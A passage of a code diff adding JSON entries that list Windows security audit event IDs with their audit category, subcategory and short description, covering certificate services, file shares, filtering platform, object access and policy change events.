+		"description": "One or more certificate request attributes changed. ",
+		"full_desc": "4874: One or more certificate request attributes changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4875,
+		"description": "Certificate Services received a request to shut down. ",
+		"full_desc": "4875: Certificate Services received a request to shut down. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4876,
+		"description": "Certificate Services backup started. ",
+		"full_desc": "4876: Certificate Services backup started. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4877,
+		"description": "Certificate Services backup completed. ",
+		"full_desc": "4877: Certificate Services backup completed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4878,
+		"description": "Certificate Services restore started. ",
+		"full_desc": "4878: Certificate Services restore started. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4879,
+		"description": "Certificate Services restore completed. ",
+		"full_desc": "4879: Certificate Services restore completed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4880,
+		"description": "Certificate Services started. ",
+		"full_desc": "4880: Certificate Services started. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4881,
+		"description": "Certificate Services stopped. ",
+		"full_desc": "4881: Certificate Services stopped. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4882,
+		"description": "The security permissions for Certificate Services changed. ",
+		"full_desc": "4882: The security permissions for Certificate Services changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4883,
+		"description": "Certificate Services retrieved an archived key. ",
+		"full_desc": "4883: Certificate Services retrieved an archived key. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4884,
+		"description": "Certificate Services imported a certificate into its database. ",
+		"full_desc": "4884: Certificate Services imported a certificate into its database. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4885,
+		"description": "The audit filter for Certificate Services changed. ",
+		"full_desc": "4885: The audit filter for Certificate Services changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4886,
+		"description": "Certificate Services received a certificate request. ",
+		"full_desc": "4886: Certificate Services received a certificate request. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4887,
+		"description": "Certificate Services approved a certificate request and issued a certificate. ",
+		"full_desc": "4887: Certificate Services approved a certificate request and issued a certificate. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4888,
+		"description": "Certificate Services denied a certificate request. ",
+		"full_desc": "4888: Certificate Services denied a certificate request. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4889,
+		"description": "Certificate Services set the status of a certificate request to pending. ",
+		"full_desc": "4889: Certificate Services set the status of a certificate request to pending. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4890,
+		"description": "The certificate manager settings for Certificate Services changed. ",
+		"full_desc": "4890: The certificate manager settings for Certificate Services changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4891,
+		"description": "A configuration entry changed in Certificate Services. ",
+		"full_desc": "4891: A configuration entry changed in Certificate Services. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4892,
+		"description": "A property of Certificate Services changed. ",
+		"full_desc": "4892: A property of Certificate Services changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4893,
+		"description": "Certificate Services archived a key. ",
+		"full_desc": "4893: Certificate Services archived a key. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4894,
+		"description": "Certificate Services imported and archived a key. ",
+		"full_desc": "4894: Certificate Services imported and archived a key. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4895,
+		"description": "Certificate Services published the CA certificate to Active Directory Domain Services. ",
+		"full_desc": "4895: Certificate Services published the CA certificate to Active Directory Domain Services. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4896,
+		"description": "One or more rows have been deleted from the certificate database. ",
+		"full_desc": "4896: One or more rows have been deleted from the certificate database. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4897,
+		"description": "Role separation enabled: ",
+		"full_desc": "4897: Role separation enabled: "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4898,
+		"description": "Certificate Services loaded a template. ",
+		"full_desc": "4898: Certificate Services loaded a template. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4899,
+		"description": "A Certificate Services template was updated. ",
+		"full_desc": "4899: A Certificate Services template was updated. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4900,
+		"description": "Certificate Services template security was updated. ",
+		"full_desc": "4900: Certificate Services template security was updated. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5120,
+		"description": "OCSP Responder Service Started. ",
+		"full_desc": "5120: OCSP Responder Service Started. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5121,
+		"description": "OCSP Responder Service Stopped. ",
+		"full_desc": "5121: OCSP Responder Service Stopped. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5122,
+		"description": "A Configuration entry changed in the OCSP Responder Service. ",
+		"full_desc": "5122: A Configuration entry changed in the OCSP Responder Service. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5123,
+		"description": "A configuration entry changed in the OCSP Responder Service. ",
+		"full_desc": "5123: A configuration entry changed in the OCSP Responder Service. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5124,
+		"description": "A security setting was updated on OCSP Responder Service. ",
+		"full_desc": "5124: A security setting was updated on OCSP Responder Service. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5125,
+		"description": "A request was submitted to OCSP Responder Service. ",
+		"full_desc": "5125: A request was submitted to OCSP Responder Service. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5126,
+		"description": "Signing Certificate was automatically updated by the OCSP Responder Service. ",
+		"full_desc": "5126: Signing Certificate was automatically updated by the OCSP Responder Service. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 5127,
+		"description": "The OCSP Revocation Provider successfully updated the revocation information. ",
+		"full_desc": "5127: The OCSP Revocation Provider successfully updated the revocation information. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Detailed File Share",
+		"event_id": 5145,
+		"description": " A network share object was checked to see whether the client can be granted desired access. ",
+		"full_desc": "5145:  A network share object was checked to see whether the client can be granted desired access. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File Share",
+		"event_id": 5140,
+		"description": "A network share object was accessed. ",
+		"full_desc": "5140: A network share object was accessed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File Share",
+		"event_id": 5142,
+		"description": "A network share object was added.",
+		"full_desc": "5142: A network share object was added."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File Share",
+		"event_id": 5143,
+		"description": "A network share object was modified. ",
+		"full_desc": "5143: A network share object was modified. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File Share",
+		"event_id": 5144,
+		"description": "A network share object was deleted.",
+		"full_desc": "5144: A network share object was deleted."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File Share",
+		"event_id": 5168,
+		"description": "Spn check for SMB/SMB2 failed.",
+		"full_desc": "5168: Spn check for SMB/SMB2 failed."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File System",
+		"event_id": 4664,
+		"description": "An attempt was made to create a hard link. ",
+		"full_desc": "4664: An attempt was made to create a hard link. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File System",
+		"event_id": 4985,
+		"description": "The state of a transaction has changed. ",
+		"full_desc": "4985: The state of a transaction has changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "File System",
+		"event_id": 5051,
+		"description": "A file was virtualized. ",
+		"full_desc": "5051: A file was virtualized. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5031,
+		"description": "The Windows Firewall Service blocked an application from accepting incoming connections on the network.",
+		"full_desc": "5031: The Windows Firewall Service blocked an application from accepting incoming connections on the network."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5148,
+		"description": "The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.",
+		"full_desc": "5148: The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5149,
+		"description": "The DoS attack has subsided and normal processing is being resumed.",
+		"full_desc": "5149: The DoS attack has subsided and normal processing is being resumed."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5150,
+		"description": "The Windows Filtering Platform has blocked a packet.",
+		"full_desc": "5150: The Windows Filtering Platform has blocked a packet."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5151,
+		"description": "A more restrictive Windows Filtering Platform filter has blocked a packet.",
+		"full_desc": "5151: A more restrictive Windows Filtering Platform filter has blocked a packet."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5154,
+		"description": "The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections. ",
+		"full_desc": "5154: The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5155,
+		"description": "The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections. ",
+		"full_desc": "5155: The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5156,
+		"description": "The Windows Filtering Platform has permitted a connection.",
+		"full_desc": "5156: The Windows Filtering Platform has permitted a connection."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5157,
+		"description": "The Windows Filtering Platform has blocked a connection. ",
+		"full_desc": "5157: The Windows Filtering Platform has blocked a connection. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5158,
+		"description": "The Windows Filtering Platform has permitted a bind to a local port. ",
+		"full_desc": "5158: The Windows Filtering Platform has permitted a bind to a local port. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Connection",
+		"event_id": 5159,
+		"description": "The Windows Filtering Platform has blocked a bind to a local port. ",
+		"full_desc": "5159: The Windows Filtering Platform has blocked a bind to a local port. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Packet Drop",
+		"event_id": 5152,
+		"description": " The Windows Filtering Platform has blocked a packet.",
+		"full_desc": "5152:  The Windows Filtering Platform has blocked a packet."
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Filtering Platform Packet Drop",
+		"event_id": 5153,
+		"description": " A more restrictive Windows Filtering Platform filter has blocked a packet. ",
+		"full_desc": "5153:  A more restrictive Windows Filtering Platform filter has blocked a packet. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Handle Manipulation",
+		"event_id": 4656,
+		"description": "A handle to an object was requested. ",
+		"full_desc": "4656: A handle to an object was requested. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Handle Manipulation",
+		"event_id": 4658,
+		"description": "The handle to an object was closed. ",
+		"full_desc": "4658: The handle to an object was closed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Handle Manipulation",
+		"event_id": 4690,
+		"description": "An attempt was made to duplicate a handle to an object. ",
+		"full_desc": "4690: An attempt was made to duplicate a handle to an object. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4671,
+		"description": "An application attempted to access a blocked ordinal through the TBS. ",
+		"full_desc": "4671: An application attempted to access a blocked ordinal through the TBS. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4691,
+		"description": "Indirect access to an object was requested. ",
+		"full_desc": "4691: Indirect access to an object was requested. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4698,
+		"description": "A scheduled task was created. ",
+		"full_desc": "4698: A scheduled task was created. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4699,
+		"description": "A scheduled task was deleted. ",
+		"full_desc": "4699: A scheduled task was deleted. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4700,
+		"description": "A scheduled task was enabled. ",
+		"full_desc": "4700: A scheduled task was enabled. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4701,
+		"description": "A scheduled task was disabled. ",
+		"full_desc": "4701: A scheduled task was disabled. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 4702,
+		"description": "A scheduled task was updated. ",
+		"full_desc": "4702: A scheduled task was updated. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 5888,
+		"description": "An object in the COM+ Catalog was modified. ",
+		"full_desc": "5888: An object in the COM+ Catalog was modified. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 5889,
+		"description": "An object was deleted from the COM+ Catalog. ",
+		"full_desc": "5889: An object was deleted from the COM+ Catalog. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Other Object Access Events",
+		"event_id": 5890,
+		"description": "An object was added to the COM+ Catalog. ",
+		"full_desc": "5890: An object was added to the COM+ Catalog. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Registry",
+		"event_id": 4657,
+		"description": " A registry value was modified. ",
+		"full_desc": "4657:  A registry value was modified. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Registry",
+		"event_id": 5039,
+		"description": " A registry key was virtualized. ",
+		"full_desc": "5039:  A registry key was virtualized. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Special Multi-use",
+		"event_id": 4659,
+		"description": "A handle to an object was requested with intent to delete. ",
+		"full_desc": "4659: A handle to an object was requested with intent to delete. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Special Multi-use",
+		"event_id": 4660,
+		"description": "An object was deleted. ",
+		"full_desc": "4660: An object was deleted. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Special Multi-use",
+		"event_id": 4661,
+		"description": "A handle to an object was requested. ",
+		"full_desc": "4661: A handle to an object was requested. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Special Multi-use",
+		"event_id": 4663,
+		"description": "An attempt was made to access an object. ",
+		"full_desc": "4663: An attempt was made to access an object. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4715,
+		"description": "The audit policy (SACL) on an object was changed. ",
+		"full_desc": "4715: The audit policy (SACL) on an object was changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4719,
+		"description": "System audit policy was changed. ",
+		"full_desc": "4719: System audit policy was changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4817,
+		"description": "Auditing settings on an object were changed.",
+		"full_desc": "4817: Auditing settings on an object were changed."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4902,
+		"description": "The Per-user audit policy table was created. ",
+		"full_desc": "4902: The Per-user audit policy table was created. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4904,
+		"description": "An attempt was made to register a security event source. ",
+		"full_desc": "4904: An attempt was made to register a security event source. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4905,
+		"description": "An attempt was made to unregister a security event source. ",
+		"full_desc": "4905: An attempt was made to unregister a security event source. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4906,
+		"description": "The CrashOnAuditFail value has changed. ",
+		"full_desc": "4906: The CrashOnAuditFail value has changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4907,
+		"description": "Auditing settings on object were changed. ",
+		"full_desc": "4907: Auditing settings on object were changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4908,
+		"description": "Special Groups Logon table modified. ",
+		"full_desc": "4908: Special Groups Logon table modified. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Audit Policy Change",
+		"event_id": 4912,
+		"description": "Per User Audit Policy was changed. ",
+		"full_desc": "4912: Per User Audit Policy was changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4706,
+		"description": "A new trust was created to a domain. ",
+		"full_desc": "4706: A new trust was created to a domain. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4707,
+		"description": "A trust to a domain was removed. ",
+		"full_desc": "4707: A trust to a domain was removed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4713,
+		"description": "Kerberos policy was changed. ",
+		"full_desc": "4713: Kerberos policy was changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4716,
+		"description": "Trusted domain information was modified. ",
+		"full_desc": "4716: Trusted domain information was modified. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4717,
+		"description": "System security access was granted to an account. ",
+		"full_desc": "4717: System security access was granted to an account. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4718,
+		"description": "System security access was removed from an account. ",
+		"full_desc": "4718: System security access was removed from an account. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4739,
+		"description": "Domain Policy was changed. ",
+		"full_desc": "4739: Domain Policy was changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4864,
+		"description": "A namespace collision was detected. ",
+		"full_desc": "4864: A namespace collision was detected. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4865,
+		"description": "A trusted forest information entry was added. ",
+		"full_desc": "4865: A trusted forest information entry was added. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4866,
+		"description": "A trusted forest information entry was removed. ",
+		"full_desc": "4866: A trusted forest information entry was removed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authentication Policy Change",
+		"event_id": 4867,
+		"description": "A trusted forest information entry was modified. ",
+		"full_desc": "4867: A trusted forest information entry was modified. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authorization Policy Change",
+		"event_id": 4704,
+		"description": "A user right was assigned. ",
+		"full_desc": "4704: A user right was assigned. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authorization Policy Change",
+		"event_id": 4705,
+		"description": "A user right was removed. ",
+		"full_desc": "4705: A user right was removed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Authorization Policy Change",
+		"event_id": 4714,
+		"description": "Data Recovery Agent group policy for Encrypting File System (EFS) has changed. The new changes have been applied.",
+		"full_desc": "4714: Data Recovery Agent group policy for Encrypting File System (EFS) has changed. The new changes have been applied."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 4709,
+		"description": "The IPsec Policy Agent service was started.",
+		"full_desc": "4709: The IPsec Policy Agent service was started."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 4710,
+		"description": "The IPsec Policy Agent service was disabled.",
+		"full_desc": "4710: The IPsec Policy Agent service was disabled."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 4711,
+		"description": "May contain any one of the following:",
+		"full_desc": "4711: May contain any one of the following:"
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 4712,
+		"description": "IPsec Policy Agent encountered a potentially serious failure.",
+		"full_desc": "4712: IPsec Policy Agent encountered a potentially serious failure."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5040,
+		"description": "A change was made to IPsec settings. An authentication set was added.",
+		"full_desc": "5040: A change was made to IPsec settings. An authentication set was added."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5041,
+		"description": "A change was made to IPsec settings. An authentication set was modified.",
+		"full_desc": "5041: A change was made to IPsec settings. An authentication set was modified."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5042,
+		"description": "A change was made to IPsec settings. An authentication set was deleted.",
+		"full_desc": "5042: A change was made to IPsec settings. An authentication set was deleted."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5043,
+		"description": "A change was made to IPsec settings. A connection security rule was added.",
+		"full_desc": "5043: A change was made to IPsec settings. A connection security rule was added."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5044,
+		"description": "A change was made to IPsec settings. A connection security rule was modified.",
+		"full_desc": "5044: A change was made to IPsec settings. A connection security rule was modified."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5045,
+		"description": "A change was made to IPsec settings. A connection security rule was deleted.",
+		"full_desc": "5045: A change was made to IPsec settings. A connection security rule was deleted."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5046,
+		"description": "A change was made to IPsec settings. A crypto set was added.",
+		"full_desc": "5046: A change was made to IPsec settings. A crypto set was added."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5047,
+		"description": "A change was made to IPsec settings. A crypto set was modified.",
+		"full_desc": "5047: A change was made to IPsec settings. A crypto set was modified."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5048,
+		"description": "A change was made to IPsec settings. A crypto set was deleted.",
+		"full_desc": "5048: A change was made to IPsec settings. A crypto set was deleted."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5440,
+		"description": "The following callout was present when the Windows Filtering Platform Base Filtering Engine started. ",
+		"full_desc": "5440: The following callout was present when the Windows Filtering Platform Base Filtering Engine started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5441,
+		"description": "The following filter was present when the Windows Filtering Platform Base Filtering Engine started. ",
+		"full_desc": "5441: The following filter was present when the Windows Filtering Platform Base Filtering Engine started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5442,
+		"description": "The following provider was present when the Windows Filtering Platform Base Filtering Engine started. ",
+		"full_desc": "5442: The following provider was present when the Windows Filtering Platform Base Filtering Engine started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5443,
+		"description": "The following provider context was present when the Windows Filtering Platform Base Filtering Engine started. ",
+		"full_desc": "5443: The following provider context was present when the Windows Filtering Platform Base Filtering Engine started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5444,
+		"description": "The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started. ",
+		"full_desc": "5444: The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5446,
+		"description": "A Windows Filtering Platform callout has been changed. ",
+		"full_desc": "5446: A Windows Filtering Platform callout has been changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5448,
+		"description": "A Windows Filtering Platform provider has been changed. ",
+		"full_desc": "5448: A Windows Filtering Platform provider has been changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5449,
+		"description": "A Windows Filtering Platform provider context has been changed. ",
+		"full_desc": "5449: A Windows Filtering Platform provider context has been changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5450,
+		"description": "A Windows Filtering Platform sub-layer has been changed. ",
+		"full_desc": "5450: A Windows Filtering Platform sub-layer has been changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5456,
+		"description": "PAStore Engine applied Active Directory storage IPsec policy on the computer. ",
+		"full_desc": "5456: PAStore Engine applied Active Directory storage IPsec policy on the computer. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5457,
+		"description": "IPsec Policy Agent failed to apply Active Directory storage IPsec policy on the computer.",
+		"full_desc": "5457: IPsec Policy Agent failed to apply Active Directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5458,
+		"description": "IPsec Policy Agent applied locally cached copy of Active Directory storage IPsec policy on the computer.",
+		"full_desc": "5458: IPsec Policy Agent applied locally cached copy of Active Directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5459,
+		"description": "IPsec Policy Agent failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.",
+		"full_desc": "5459: IPsec Policy Agent failed to apply locally cached copy of Active Directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5460,
+		"description": "IPsec Policy Agent applied local registry storage IPsec policy on the computer.",
+		"full_desc": "5460: IPsec Policy Agent applied local registry storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5461,
+		"description": "IPsec Policy Agent failed to apply local registry storage IPsec policy on the computer.",
+		"full_desc": "5461: IPsec Policy Agent failed to apply local registry storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5462,
+		"description": "IPsec Policy Agent failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.",
+		"full_desc": "5462: IPsec Policy Agent failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5463,
+		"description": "IPsec Policy Agent polled for changes to the active IPsec policy and detected no changes.",
+		"full_desc": "5463: IPsec Policy Agent polled for changes to the active IPsec policy and detected no changes."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5464,
+		"description": "IPsec Policy Agent polled for changes to the active IPsec policy, detected changes, and applied them.",
+		"full_desc": "5464: IPsec Policy Agent polled for changes to the active IPsec policy, detected changes, and applied them."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5465,
+		"description": "IPsec Policy Agent received a control for forced reloading of IPsec policy and processed the control successfully.",
+		"full_desc": "5465: IPsec Policy Agent received a control for forced reloading of IPsec policy and processed the control successfully."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5466,
+		"description": "IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.",
+		"full_desc": "5466: IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5467,
+		"description": "IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used.",
+		"full_desc": "5467: IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5468,
